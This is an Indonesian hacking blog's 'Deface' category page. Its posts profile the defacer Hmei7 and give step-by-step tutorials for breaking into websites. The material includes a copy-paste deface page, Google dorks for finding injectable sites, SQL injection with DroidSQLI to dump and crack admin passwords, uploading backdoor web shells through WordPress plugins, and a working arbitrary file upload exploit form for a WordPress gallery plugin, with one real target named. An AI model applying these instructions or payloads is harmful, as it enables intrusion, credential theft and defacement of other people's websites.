Infinite Haxor: Deface

News Ticker

Latest Posts
Browsing Category "Deface"

Download Script Deface Simple Dari HMEI7 Dan Mengenal HMEI7 Defacer Yang Ditakuti Didunia

- No Comments


  • Mengenal Siapa HMEI 7

Hmei7 sempat membuat heboh karena berhasil mengacak-acak situs blogging, Wordpress, beberapa bulan lalu. Tidak hanya Wordpress, menurut catatan di situs Zone-H, Hmei7 telah meretas (deface) ribuan situs di dunia.


Bahkan, eHacking News (02/01), pernah mengulas bahwa dia juga berhasil melumpuhkan lebih dari 5000 website di seluruh dunia hanya dalam waktu 2 hari saja. Karena ulahnya itu, Hmei7 dikenal sebagai Mass Defacer dunia.



Namun, siapakah sosok asli dibalik inisial Hmei7 ini?



Sampai sekarang informasi mengenai hacker satu ini masih simpang siur. Bahkan, Softpedia berhasil mewawancarai seseorang yang mengklaim dirinya adalah Hmei7 (asli), namun ternyata (menurut pihak Softpedia) bukan.





Bahkan ada sebuah blog dengan nama hmei7.blogspot.com. Sayangnya, blog satu ini juga belum dapat dijadikan sebagai bukti sebagai milik dari sang defacer tersebut.



Dari banyaknya data yang beredar di internet, Hmei7 adalah seorang anak kuliahan (mungkin sudah lulus sekarang ini) di salah satu universitas negeri di Malang, Jawa Timur. Background pendidikan di perkuliahannya adalah Diskomvis.

Baca Juga :




Kabarnya, dia mulai aktif di dunia hacking sejak tahun 2001 silam. Selain di forum-forum, Hmei7 juga kerap hadir di wahana chatting mIRC dengan nick name berbeda.



Selain di mIRC, dia juga sering muncul di Yahoo!Chat Group serta forum-forum yang berhubungan dengan cyber dan teknologi. Dari situlah, Hmei7 mulai belajar banyak dengan mempelajari tutorial, bertanya langsung ke para peretas senior atau juga melakukan praktik langsung.




Setelah mempunyai 'cukup ilmu,' Hmei7 mencoba bergerilya secara luas dan situs pertama yang berhasil dia lumpuhkan adalah website milik IBM.

Menurut Softpedia (15/06), dalam dan setelah melakukan aksinya, Hmei7 memang mengetahui banyak ID dan password di situs yang diserangnya, namun dia tidak ingin mempublikasikan atau menggunakannya. Dia hanya senang melakukan deface dan memajang namanya di halaman utama situs yang bersangkutan.


Menurut data dari Zone-H, sampai sekarang, sudah ada ratusan ribu situs dan blog yang berhasil dia lumpuhkan atau juga dia ganti tampilan depannya. Bahkan dia sempat menduduki peringkat 1 dunia sebagai hacker (defacer) menurut peringkat di Zone-H.




Walaupun banyak situs atau blog yang mengatakan bahwa mereka telah berhasil mengungkap jati diri dari Hmei7, namun sekali lagi konfirmasi tersebut masih terlalu abu-abu karena tidak ada bukti untuk ungkap siapa sebenarnya Hmei7.

Download Script Deface Simple By HMEI 7 Dibawah Ini :

Atau Copy Paste Dibawah Ini :


<!--------------------------------------------
owned by Hmei7
4ever only mail, n1cedre4m[at]yahoo[dot]com
no fb, no tweet, and also no other
2006 - now, indonesia
--------------------------------------------->
<title>hacked by Hmei7</title>
<script type="text/javascript">
var snowmax=35
var snowcolor=new Array("#AAAACC","#DDDDFF","#CCCCDD","#F3F3F3","#F0FFFF")
var snowtype=new Array("Arial Black","Arial Narrow","Times","Comic Sans MS")
var snowletter="*"
var sinkspeed=0.6
var snowmaxsize=22
var snowminsize=8
var snowingzone=1
// Do not edit below this line
var snow=new Array()
var marginbottom
var marginright
var timer
var i_snow=0
var x_mv=new Array();
var crds=new Array();
var lftrght=new Array();
var browserinfos=navigator.userAgent
var ie5=document.all&&document.getElementById&&!browserinfos.match(/Opera/)
var ns6=document.getElementById&&!document.all
var opera=browserinfos.match(/Opera/)
var browserok=ie5||ns6||opera
function randommaker(range) {
rand=Math.floor(range*Math.random())
return rand
}
function initsnow() {
if (ie5 || opera) {
marginbottom = document.body.clientHeight
marginright = document.body.clientWidth
}
else if (ns6) {
marginbottom = window.innerHeight
marginright = window.innerWidth
}
var snowsizerange=snowmaxsize-snowminsize
for (i=0;i<=snowmax;i++) {
crds[i] = 0;
lftrght[i] = Math.random()*15;
x_mv[i] = 0.03 + Math.random()/10;
snow[i]=document.getElementById("s"+i)
snow[i].style.fontFamily=snowtype[randommaker(snowtype.length)]
snow[i].size=randommaker(snowsizerange)+snowminsize
snow[i].style.fontSize=snow[i].size
snow[i].style.color=snowcolor[randommaker(snowcolor.length)]
snow[i].sink=sinkspeed*snow[i].size/5
if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
snow[i].posy=randommaker(2*marginbottom-marginbottom-2*snow[i].size)
snow[i].style.left=snow[i].posx
snow[i].style.top=snow[i].posy
}
movesnow()
}
function movesnow() {
for (i=0;i<=snowmax;i++) {
crds[i] += x_mv[i];
snow[i].posy+=snow[i].sink
snow[i].style.left=snow[i].posx+lftrght[i]*Math.sin(crds[i]);
snow[i].style.top=snow[i].posy
if (snow[i].posy>=marginbottom-2*snow[i].size || parseInt(snow[i].style.left)>(marginright-3*lftrght[i])){
if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
snow[i].posy=0
}
}
var timer=setTimeout("movesnow()",50)
}
for (i=0;i<=snowmax;i++) {
document.write("<span id='s"+i+"' style='position:absolute;top:-"+snowmaxsize+"'>"+snowletter+"</span>")
}
if (browserok) {
window.onload=initsnow
}
</script>
<style type="text/css">
body {background-color:#000000;}
#q {font: 40px impact;color:#ffffff;}
</style>
<table width=100% height=100%>
<td align=center>
<div id="q">hacked by Hmei7</div>
</td>
</table>


Jika Sudah Anda Copy Semua , Sekarang Buka Notepad Paste Script Yang Sudah Di Copy > Save Dengan Extensi .html

Tutorial Upload Shell Di CMS Wordpress

- No Comments


WordPress adalah sebuah aplikasi sumber terbuka (open source) yang sangat populer digunakan sebagai mesin blog (blog engine). WordPress dibangun dengan bahasa pemrograman PHP dan basis data (database) MySQL. PHP dan MySQL, keduanya merupakan perangkat lunak sumber terbuka (open source software). Selain sebagai blog, WordPress juga mulai digunakan sebagai sebuah CMS (Content Management System) karena kemampuannya untuk dimodifikasi dan disesuaikan dengan kebutuhan penggunanya.


Sementara Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya)

Langsung To The Point :

1. Target Kalian Yang Sudah Bisa Login Ke WP-Admin Login .

2. Lalu cari Dan Pilih Plugins > Add New  > Upload Plugins > Pilih Shell > Install Now (Lihat Gambar Step by Step)


Jika Belum Punya Shell Download Shell Backdoor Ini 


  • Step 1
Klik Plugins > Add New , Kalian Akan Dialihkan Ke Upload Shell ,Klik Gambar Agar Jelas :



  • Step 2

Klik Upload Lalu Upload Shell Yang Udah Kalia Siapkan. 

Baca Juga :



  •  Step 3
Setelah Berhasil Selesai Upload , Disini Tinggal Isi FTP User & Password .


4. Lalu Ke Media > Library Dan Klik Shell Kalian > Buka Url (Lihat Gambar Step by Step)


  • Step 1
Klik 2x


  • Step 2
Salin Url , Isi Description Terserah



  •  SUKSES 
Buka Url Yang Sudah Kalian Salin Di New Tab :



Kalau Shell Kalian Mengalami DIR Merah Pada CMS Wordpress Kalian Bisa Lihat Cara Lain Mengatasi Jumping DIR Merah [CMS WORDPRESS]

Jika Kurang Paham Dengan Tutor Di Atas , Silahkan Liat Video Ini :

                                   

Tutorial Cara Mudah Deface Dengan DroidSQLI Terbaru Tanpa Root .

- No Comments


  • Apa Itu Deface ?


Deface adalah suatu kegiatan untuk merubah tampilan suatu website baik halaman utama atau index filenya ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (bisa di folder atau disebuah file). Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agarhasil kerjanya diketahui oleh khalayak hacker. Sebenarnya ada banyak tekhnik deface, namun Disini Kita akan Belajar Tekhnik SQLI yang dapat kalian lakukan secara mudah diandroid tanpa memerlukan akses root . Yaitu Dengan Aplikasi DroidSQLI .

Jika Kalian Ingin Belajar Tutorial Via PC Bisa Lihat Di Tutorial Deface Dengan WP ARBITRARY DREAM WORK GALLERY FILE UPLOAD .

Cara ini cukup mudah dilakukan karena hanya memanfaatkan celah SQLi pada sebuah website
To The Point .

1.Niat

2.Cari target sasaran. Bisa kalian mencarinya digoogle menggunakan dork dibawah ini: 
Inurl:"index.php?id="
Inurl:"data.php?id="

3.Koneksi Internet yang cukup lancar

4. Segelas kopi ( Tidak Wajib )

Bahan-bahan diatas sudah disiapkan?
Jika sudah kita akan langsung menuju ketutor nya :
  • Cari target yang vuln SQLI. silahkan kalian ngedork digoogle. Caranya tinggal salin kode dork diatas lalu search di Google. Maka akan muncul ribuan situs. Untuk mengetes apakah website tersebut rentan terhadap SQLI bisa kalian tambahkan tanda ( ' ) dibelakang url. 

Contoh: www.target.com/index.php?id=3 lalu tambahkan tanda menjadi www.target.com/index.php?id=3' lalu tekan enter.

Jika terjadi error atau mucul tulisan You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1maka website tersebut dapat kita deface menggunakan DroidSQLI. Jika sudah dapat contoh http://www.minutesemeiotic.org/home.php?id=1
  • Buka aplikasi DroidSQLi yang sudah kalian download tadi.Masukkan target kalian ke kolom "Target Url"


  • Klik tombol "Inject" yang berada dipojok kanan atas.
  • Biarkan aplikasi mengeksekusi target.
  • Jika sudah selesai maka akan muncul database website tersebut.


  • Buka databasenya. Contoh punya mimin nama databasenya [purport]
  • Karena tujuan kita deface,maka kita akan mencari dimana letak data admin berada.Biasanya terletak di table_admin atau table_user.Pokoknya cari aja yg berhubungan dengan admin


  • Nah punya ane data adminnya berada di wp_users(ingat!setiap website berbeda-beda).Langsung aja kita buka wp_users nya.
  • Dan kita berhasil nemu data adminnya .


  • Langsung aja centang data yg ingin kalian ketahui.misal username & password,setelah itu klik "Get Records"



  • Nah itu dah ketemu nama & pass admin.
  • Namun password tersebut masih berbentik md5 jadi kalian harus merubahnya dulu menggunakan tools Disini
  • Jika sudah kalian tinggal login kewebsite tersebut. Untuk mencari halaman login admin kalian bisa menggunakan tools ini Klik Disini
Jika Bisa Kalian Up Shell Supaya Bisa Tebas Index , Jika Belum Punya Shell Lihat Artikel Download Shell Backdoor Terbaru

Link Download :


Tutorial Cara Lain Mengatasi Jumping DIR Merah [CMS WORDPRESS]

- No Comments

Pernah Mengalami DIR Merah Saat Dapat Target Lain Dari Jumping ? Pasti Pernah Dong
Oke kali ini NubiHaxor akan memberikan solusinya ^_^
Cara ini saya menggunakan CMS Wordpress dan Apabila ada yang lain saya tidak tau sama atau tidak caranya .


Oke langsung saja, saya disini menggunakan shell IndoXploit untuk shell lainnya saya tidak tau juga :"v
Pilih [ Auto Edit Title WordPress ]



Ubah Set Title sesuai keinginan kalian, Edit Content Jika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.
Saya disini pilih yang simple saja :'v


Setelah itu Klik Hajar dan Buka URL yang berwarna Hijau - Jika URL berwarna Merah maka cari Hati yg lain saja,.. Maksudnya Target gitu lhoo :"D (Bisa Lihat Gambar)


Jika Tidak Punya Shell , Download Shell Backdoor Anniversary D4RK FRI3NDS 

Selesai .
My Target : aramnews1st.com
Jika Niat Cantumkan Nick Kami : ./MaqloeGeming / ./Mr.Java404 & AbrarKUN .

Copas ? Sertakan Sumber :)

Download Shell Backdoor Deface Keren Fitur Lengkap - Terbaru

- No Comments

  • Apa Itu Shell ?


Shell, seperti namanya yaitu Shell yang berada dalam Web. Web Shell ini adalah sekumpulan script, yang dapat mengeksekusi perintah shell. Seperti yang terkenal saat ini adalah C99, r57, bypass, dan masih banyak lagi.

Kali ini saia membuat D4RK FR13NDS SHELL (Recode Shell Wso)
Cocok untuk melakukan Backconnect (rooting server)
Oke Langsung Sadja ini Tampilannya

Jika Ingin Belajar Lebih Banyak Tentang Rooting Server Baca Disini Cara Rooting Server With Ngrok
Tampilan Shell


Download Dibawah :

Tutorial Deface Dengan WP ARBITRARY DREAM WORK GALLERY FILE UPLOAD

- No Comments

Klik Gambar Agar Jelas
To The Point 

Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (Gunakan otak wibu kalian biar makin fresh)
1. Dorking dulu dengan dork diatas lalu pilih Target kalian (Lihat Gambar)


2. Copy Script dibawah & Simpan di notepad berformat .html (Contoh : maqloegeming.html)
Ambil Disini : Pastebin.com

Atau Copas Disini 

<form action="www.target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>



3. Ganti www.target.com dengan Target kalian (Lihat Gambar - Step by Step Dorking & Up Sc Deface)

  • Step 1


  • Step 2



  • Step 3



  • Step 4



  • Step 5





  • Step 6




  • Step 7



  • Step 8


Mudah kan xD
Jika Kurang Paham Bisa Dengan Tutorial Di Atas Ikuti Tutorial Videonya Dibawah :



Special Thanks  ./MaqloeGeming And All My Friend In D4RK FR13NDS
Ingin Tahu Lebih Banyak Tentang D4RK FR13NDS ? 

Like Fanspage Disini -->  D4RK FR13NDS 
Gabung Grup Disini --> D4RK FR13NDS